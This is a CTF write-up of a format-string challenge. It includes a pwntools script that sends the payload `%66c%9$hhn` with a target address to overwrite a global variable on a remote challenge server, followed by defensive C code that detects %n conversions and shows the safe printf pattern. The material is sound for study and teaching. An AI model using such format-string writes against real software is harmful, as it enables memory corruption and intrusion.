###### tags: `nactf`

# format_string(300)

- This challenge is actually simple; the main thing is to understand the code.
- ![](https://i.imgur.com/mz19mOH.png)
- First, press F5 to decompile.
- We find `V3 = 0x30u` and `num = V3`.
- ![](https://i.imgur.com/zr4fL66.png)
- Going into `check num`:
- The low byte of `V0` (LOBYTE, its least significant byte) is changed to 0x42 (66).
- If `num` equals `V0` we get the flag, so the least significant byte of `num` also has to become 0x42.
- Running it in gdb straight to `check num`, we find:
- ![](https://i.imgur.com/Tv6QmdV.png)
- The location of `num`:
- ![](https://i.imgur.com/ShhxwaP.png)
- PIE is not enabled either.

```python
from pwn import *

context.arch = 'amd64'
p = remote("challenges.ctfd.io", 30266)
#p = process('./format')

# Print 66 (0x42) characters, then %hhn stores the low byte of the printed
# count into the pointer found at format argument 9.  The buffer starts at
# argument 6, so padding to 0x18 bytes (3 qwords) puts the address of num
# (0x404080, no PIE) at argument 9.
fmt = b'%66c%9$hhn'.ljust(0x18, b'\x00') + p64(0x404080)
p.sendafter(b'Give me some text.', fmt)
p.interactive()
```

- Using `%p` we find the buffer on the stack at the 6th argument; after `ljust` to 0x18 that is 6 + 3, so the write goes through the 9th argument.
- ![](https://i.imgur.com/7H0iq3E.png)
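The bug this writeup exploits is user text being passed to `printf` as the format string itself. As an added example (not code from the challenge binary), the C below reconstructs the check as the writeup describes it (`num` starts at 0x30 and passes when its low byte is 0x42; the names `num`, `check_num`, `echo_unsafe`, `echo_safe` and `has_write_conversion` are assumed), shows the unsafe call beside the hardened one, and includes a defensive scanner that flags any `%n`-family conversion (including the positional `%9$hhn` form used above) so such input can be rejected or logged before it ever reaches a format function.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Reconstruction of the challenge state as the writeup describes it:
   num starts at 0x30 and the check passes once its low byte is 0x42. */
unsigned int num = 0x30u;

/* True if fmt contains a %n / %hn / %hhn / %ln ... conversion, i.e. one
   that WRITES to memory if fmt ever reaches printf().  Handles "%%"
   escapes and positional "%9$" argument selectors. */
bool has_write_conversion(const char *fmt)
{
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')          /* "%%" is a literal percent sign */
            continue;
        /* skip positional index, flags, width, precision, length modifiers */
        while (*p && (isdigit((unsigned char)*p) || strchr("$-+ #.*hlLqjzt", *p)))
            p++;
        if (*p == 'n')
            return true;
        if (!*p)
            break;              /* dangling '%' at end of string */
    }
    return false;
}

/* Vulnerable pattern: attacker-controlled text is the format string. */
void echo_unsafe(const char *text)
{
    printf(text);               /* "%66c%9$hhn" would write memory here */
}

/* Hardened pattern: the text is only ever a %s argument, so any
   conversion specifiers inside it are printed verbatim, never parsed. */
void echo_safe(const char *text)
{
    printf("%s\n", text);
}

/* The check as described: only the least significant byte matters. */
bool check_num(void)
{
    return (num & 0xffu) == 0x42u;
}
```

Compiling with `-Wformat -Wformat-security` (and `-Werror=format-security` in a build pipeline) makes the compiler reject the `echo_unsafe` pattern outright, which is the cheapest fix for this bug class.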